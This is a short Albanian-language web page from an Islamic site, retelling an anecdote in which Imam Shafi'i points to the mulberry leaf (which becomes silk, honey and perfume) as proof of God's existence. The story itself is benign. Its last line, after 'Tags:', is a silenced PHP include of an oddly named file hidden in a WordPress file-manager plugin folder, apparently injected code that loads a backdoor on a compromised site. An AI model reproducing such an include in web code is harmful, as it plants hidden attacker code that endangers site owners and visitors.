Sexta-feira, 12/4/2024 | : : UTC+0
Mjeksia Islame
United States
+11C

Tregimi për gjethen e manaferrës !?

Tregimi për gjethen e manaferrës !?

gjethja e manaferres

Tregimi për gjethen e manaferrës !?

Një ditë erdhën disa njerëz tek imam Shafiu, dhe kërkuan prej tij që t’ja përmendë atyre argumentin për ekzistimin e Allahut të plotëfuqishëm.

Mendoi pak imam Shafiu dhe pastaj ju tha atyre:
Argumenti është: gjethja e manaferrës.
U çuditën njerëzit nga kjo përgjigje dhe e pyetën:
Si mund të jetë gjethja e manaferrës argument për ekzistimin e Allahut?
Imam Shafiu tha:
‘’Gjethja e manaferrës ka vetëm një shije,
por nëse e hanë krimbi prej saj del mëndafshi,
por nëse e hanë bleta prej saj del mjalta,
por nëse e hanë kaprolli prej saj del parfumi me erë të mirë.

E kush është Ai i cili ka mundësi të bëjë që prej një gjëje te dalin shumë gjëra tjera?!!
Ai është Allahu i lartësuar dhe i madhëruar.Krijuesi i madhë i gjithësisë.

Përktheu nga arabishtja: U.Abdullah

Tags:
@include "wp-content/plugins/wp-file-manager/lib/codemirror/mode/eiffel/include/7260.ed";